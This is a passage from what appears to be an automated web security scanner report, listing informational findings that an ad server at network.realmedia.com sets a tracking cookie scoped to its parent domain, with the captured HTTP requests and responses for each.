10.76. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308242631595&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:43:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 433
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:44:50 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/2056373542/x15/USNetwork/BCN2011020713_001_AllMenus/ROCL_RETARGETING_300x250.jpg/7
...[SNIP]...

10.77. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308243560292&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P3018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:59:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 433
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:00:19 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1907092985/x15/USNetwork/BCN2011020713_001_AllMenus/ROCL_RETARGETING_300x250.jpg/7
...[SNIP]...

10.78. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308246355891&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O3018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:45:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 966
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:34:43 GMT;path=/;httponly

document.write ('\n');
document.write ('<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/17412-120572-6712-5?mpt=409125085&mpvc=http://network.realmedia.com/
...[SNIP]...

10.79. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESYO1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308237978913&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QW4uQO1018RL|O2018UF

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:26:18 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESYO1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 441
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:15:07 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1997585565/x15/USNetwork/BCN2011050683_001_InEx/2225-300x250-A2-ApprovedbyClient.j
...[SNIP]...

10.80. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018RL

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:36:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 439
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:25:28 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/12027110/x15/USNetwork/BCN2011050683_001_InEx/2225-300x250-A2-ApprovedbyClient.jpg
...[SNIP]...

10.81. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO1018HS|O2018RL|O2018UF|O1018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018HS|O2018RL|O2018UF

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:09 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO1018HS|O2018RL|O2018UF|O1018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1331
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:40:58 GMT;path=/;httponly

document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2789858&PluID=0&w=300&h=250&ord=1117403339&ncu=$$http://network.realmedia.com/RealMedia/ads/click_lx.ad
...[SNIP]...

10.82. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308246044123&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:40:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 441
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:41:43 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1731587898/x15/USNetwork/BCN2011050683_001_InEx/2225-300x250-A2-ApprovedbyClient.j
...[SNIP]...

10.83. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO1018HS|O1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018RL|O2018UF

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:41:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO1018HS|O1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3126
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:30:38 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.84. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO2018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018HQ|O1018HS|O2018RL|O2018UF|O2018XI; NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:12:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO2018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3108
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:13:50 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.85. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308246665032&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1108
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:39:52 GMT;path=/;httponly

document.write ('<script type="text/javascript" language="javascript">\n');
document.write ('var fd_clk = ');
document.write ("'");
document.write ('http://network.realmedia.com/RealMedia/ads/click_lx
...[SNIP]...

10.86. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P3018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308243250941&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P2018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:54:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P3018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 433
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 08:42:58 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1914908445/x15/USNetwork/BCN2011020713_001_AllMenus/ROCL_RETARGETING_300x250.jpg/7
...[SNIP]...

10.87. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO4018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241390083&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO3018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:23:09 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO4018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3105
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:24:09 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.88. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308245115581&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
